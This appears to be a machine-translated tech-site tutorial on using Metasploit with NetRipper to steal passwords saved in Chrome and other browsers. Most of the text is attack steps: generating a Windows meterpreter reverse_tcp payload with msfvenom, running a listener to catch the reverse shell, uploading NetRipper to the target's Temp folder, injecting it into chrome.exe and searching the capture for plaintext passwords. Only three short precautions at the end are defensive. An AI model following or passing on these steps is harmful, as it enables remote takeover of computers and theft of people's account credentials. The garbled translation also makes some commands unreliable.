Shulou(Shulou.com)05/31 Report--

How to conduct Metasploit+NetRipper to obtain Chrome and other browser account password test, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

Preface

I will teach you hand in hand how to use Metasploit+NetRipper to get the account password saved in browsers such as Chrome.

Tools are required:

Kali Linux&Metasploit

NetRipper

1. Download and configure NetRipper

Git clone https://github.com/NytroRST/NetRipper.git

Mkdir / usr/share/metasploit-framework/modules/post/windows/gather/netripper

Cp netripper.rb / usr/share/metasploit-framework/modules/post/windows/gather/netripper/

Cp DLL.x86.dll NetRipper.x86.exe / usr/share/metasploit-framework/modules/post/windows/gather/netripper/

Cp DLL.x64.dll NetRipper.x64.exe / usr/share/metasploit-framework/modules/post/windows/gather/netripper/

two。 The Payload that generates the Windows is used to establish the connection on the target machine msfvenom-p windows/meterpreter/reverse_tcp LHOST=You IP LPORT=XXXX-f exe > Payload.exe

3. Start Metasploit and listen to msfconsole

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_tcp

Set LHOST IP

Set LPORT 6666

Options

Exploit

The target machine runs Payload to get the rebound shell.

4. Upload DLL and exe files to the target machine's C:\ Users\ Administrator\ AppData\ Local\ Temp directory Upload / root/Desjtop/NetRipper/x64/DLL.dllUpload / root/Desjtop/NetRipper/x64/NetRipper.exe

Shell

NetRipper.exe

Run NetRipper.exe

NetRipper.exe-w DLL.dll-l TEMP-p true-d 4096-s user,pass

NetRipper.exe ConfiguredDLL.dll chrome.exe

I have injected the process into the chrome browser, and you can also inject the process into other browsers (Firefox, QQ Browser, 360browser, etc.), which is dominated by the Chrom browser.

5. Test verification

Open the txt file that you just downloaded

Ctir+F enter pwpw or pwd, pass, password and other keywords to search for plaintext passwords

If you get the failed account password, it may be that the website uses the Https protocol, or when logging in, the account password is encrypted and confused locally! (personal inference) precautions:

1. Do not click on files of unknown origin

two。 Browser login can be scanned to scan login

3. If it is not necessary, you are advised not to save your social account password in the browser.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.